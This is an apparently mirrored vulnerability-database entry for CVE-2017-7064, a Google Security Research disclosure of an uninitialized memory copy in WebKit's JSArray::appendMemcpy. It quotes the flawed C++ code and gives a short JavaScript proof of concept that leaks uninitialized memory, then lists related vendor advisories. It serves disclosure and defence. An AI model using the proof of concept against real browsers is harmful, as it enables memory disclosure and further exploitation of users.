Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtGoogle Security Research1337DAY-ID-28183
HistoryJul 25, 2017 - 12:00 a.m.

WebKit JSC JSArray::appendMemcpy Uninitialized Memory Copy Vulnerability

2017-07-2500:00:00
Google Security Research
0day.today
16

0.002 Low

EPSS

Percentile

51.9%

JSON

WebKit suffers from a JSC JSArray::appendMemcpy uninitialized memory copy vulnerability.

WebKit: JSC: JSArray::appendMemcpy uninitialized memory copy 

CVE-2017-7064


WebKit: JSC: JSArray::appendMemcpy uninitialized memory copy

Here's a snippet of JSArray::appendMemcpy.

bool JSArray::appendMemcpy(ExecState* exec, VM& vm, unsigned startIndex, JSC::JSArray* otherArray)
{
    auto scope = DECLARE_THROW_SCOPE(vm);

    if (!canFastCopy(vm, otherArray))
        return false;

    IndexingType type = indexingType();
    IndexingType copyType = mergeIndexingTypeForCopying(otherArray->indexingType());
    if (type == ArrayWithUndecided && copyType != NonArray) {
        if (copyType == ArrayWithInt32)
            convertUndecidedToInt32(vm);
        else if (copyType == ArrayWithDouble)
            convertUndecidedToDouble(vm);
        else if (copyType == ArrayWithContiguous)
            convertUndecidedToContiguous(vm);
        else {
            ASSERT(copyType == ArrayWithUndecided);
            return true;
        }
    } else if (type != copyType)
        return false;

    ...

    if (type == ArrayWithDouble)
        memcpy(butterfly()->contiguousDouble().data() + startIndex, otherArray->butterfly()->contiguousDouble().data(), sizeof(JSValue) * otherLength);
    else
        memcpy(butterfly()->contiguous().data() + startIndex, otherArray->butterfly()->contiguous().data(), sizeof(JSValue) * otherLength);

    return true;
}

The method considers the case where |this|'s type is ArrayWithUndecided, but does not consider whether |otherArray|'s type is ArrayWithUndecided that may have uninitialized data.
So, when the memcpy function is called, |otherArray|'s uninitialized memory may be copied to |this| which has a type.

PoC:
function optNewArrayAndConcat() {
    let a = [,,,,,,,,,];
    return Array.prototype.concat.apply(a);
}

function main() {
    Array.prototype.constructor = {
        [Symbol.species]: function () {
            return [{}];
        }
    };

    gc();

    for (let i = 0; i < 0x10000; i++) {
        optNewArrayAndConcat().fill({});
    }

    gc();

    for (let i = 0; i < 0x20000; i++) {
        let res = optNewArrayAndConcat();
        if (res[0])
            print(res.toString());
    }
}

main();



This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.

#  0day.today [2018-01-26]  #

Related

checkpoint_advisories 1
seebug 1
prion 1
cve 1
debiancve 1
packetstorm 1
ubuntucve 1
myhack58 1
googleprojectzero 1
fedora 3
mageia 1
openvas 12
nessus 17
archlinux 1
ubuntu 1
apple 8
kaspersky 1
freebsd 1
suse 4
checkpoint_advisories
checkpoint_advisories
Apple Webkit Authentication Bypass (CVE-2017-7064)
2020-02-25 00:00:00
seebug
seebug
WebKit: JSC: JSArray::appendMemcpy uninitialized memory copy(CVE-2017-7064)
2017-07-27 00:00:00
prion
prion
Design/Logic Flaw
2017-07-20 16:29:00
cve
cve
CVE-2017-7064
2017-07-20 16:29:00
debiancve
debiancve
CVE-2017-7064
2017-07-20 16:29:00
packetstorm
packetstorm
WebKit JSC JSArray::appendMemcpy Uninitialized Memory Copy
2017-07-25 00:00:00
ubuntucve
ubuntucve
CVE-2017-7064
2017-07-20 00:00:00
myhack58
myhack58
In-depth exploration found in the wild iOS exploit chain VI-vulnerability warning-the black bar safety net
2019-09-17 00:00:00
googleprojectzero
googleprojectzero
JSC Exploits
2019-08-29 00:00:00
fedora
fedora
[SECURITY] Fedora 25 Update: webkitgtk4-2.16.6-1.fc25
2017-07-31 00:22:09
[SECURITY] Fedora 24 Update: webkitgtk4-2.16.6-1.fc24
2017-08-07 20:18:27
[SECURITY] Fedora 26 Update: webkitgtk4-2.16.6-1.fc26
2017-07-27 16:54:47
mageia
mageia
Updated webkit2 packages fix security vulnerability
2017-07-30 11:17:28
openvas
openvas
Mageia: Security Advisory (MGASA-2017-0228)
2022-01-28 00:00:00
Fedora Update for webkitgtk4 FEDORA-2017-73d6a0dfbb
2017-08-04 00:00:00
Fedora Update for webkitgtk4 FEDORA-2017-9d572cc64a
2017-08-08 00:00:00
nessus
nessus
Fedora 26 : webkitgtk4 (2017-24bddb96b5)
2017-07-28 00:00:00
Fedora 24 : webkitgtk4 (2017-9d572cc64a)
2017-08-11 00:00:00
Fedora 25 : webkitgtk4 (2017-73d6a0dfbb)
2017-07-31 00:00:00
archlinux
archlinux
[ASA-201707-25] webkit2gtk: multiple issues
2017-07-26 00:00:00
ubuntu
ubuntu
WebKitGTK+ vulnerabilities
2017-08-02 00:00:00
apple
apple
About the security content of iCloud for Windows 6.2.2 - Apple Support
2017-07-19 05:37:40
About the security content of iCloud for Windows 6.2.2
2017-07-19 00:00:00
About the security content of iTunes 12.6.2 for Windows - Apple Support
2017-07-19 05:43:08
kaspersky
kaspersky
KLA11075 Multiple vulnerabilities in Apple iTunes
2017-07-19 00:00:00
freebsd
freebsd
webkit2-gtk3 -- multiple vulnerabilities
2017-07-24 00:00:00
suse
suse
Security update for webkit2gtk3 (important)
2017-11-06 15:08:25
Security update for webkit2gtk3 (important)
2017-11-10 18:22:30
Security update for webkit2gtk3 (important)
2018-02-01 00:14:30

0.002 Low

EPSS

Percentile

51.9%

JSON
Related for 1337DAY-ID-28183
checkpoint_advisories1seebug1prion1cve1debiancve1packetstorm1ubuntucve1myhack581googleprojectzero1fedora3mageia1openvas12nessus17archlinux1ubuntu1apple8kaspersky1freebsd1suse4